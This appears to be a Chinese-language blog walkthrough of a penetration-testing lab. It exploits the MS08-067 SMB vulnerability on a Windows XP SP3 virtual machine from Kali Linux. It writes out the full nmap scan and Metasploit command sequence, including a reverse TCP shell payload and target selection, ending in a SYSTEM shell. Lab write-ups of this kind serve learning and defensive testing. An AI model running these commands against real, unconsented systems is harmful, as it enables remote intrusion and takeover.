ms08067漏洞的利用,是安全渗透测试比较常用的案例。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 但是由于自身知识的局限和疏忽,稍不留心就会失败。笔者尝试了几次才成功。
测试环境,建议虚拟机组建局域网,笔者用的是virtualbox。
靶机:Windows XP,桥接网卡,IP 192.168.0.107 系统版本:zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070 配置好局域网共享。
攻击主机: Kali Linux 2018-10-09,桥接网卡, IP 192.168.0.105 。
扫描一下目标主机
sudo nmap -sS -Pn -A 192.168.0.107可以看出,已经探测出目标系统为XP sp2或者sp3.但是没有探测出语言版本。
默认在Kali Linux开启msfconsole需要先开启postgresql服务。
sudo service postgresql start msfconsole在msf终端中,执行开启攻击。
搜索ms08_067模块,加载渗透攻击模块。
search ms08_067 use exploit/windows/smb/ms08_067_netapi查看模块的参数,一些参数必须设置,比如RHOST(目标IP),RPORT(目标端口)等。
show options set RHOST 192.168.0.107 set RPORT 445该端口默认445,但是某些情况下,139端口更好用。
设置攻击载荷,并设置必备参数。
set payload windows/shell/reverse_tcp show options set LHOST 192.168.0.105查看被影响的操作系统,默认是自动匹配。但是自动匹配不正确,会造成攻击失败。这是笔者的经验教训。
show targets set target 34 exploit截图没有完整,安装的系统是XP sp3 简体中文版,编号是34.
攻击成功,就是上图的样子,返回一个 system32> 的shell。获取权限成功。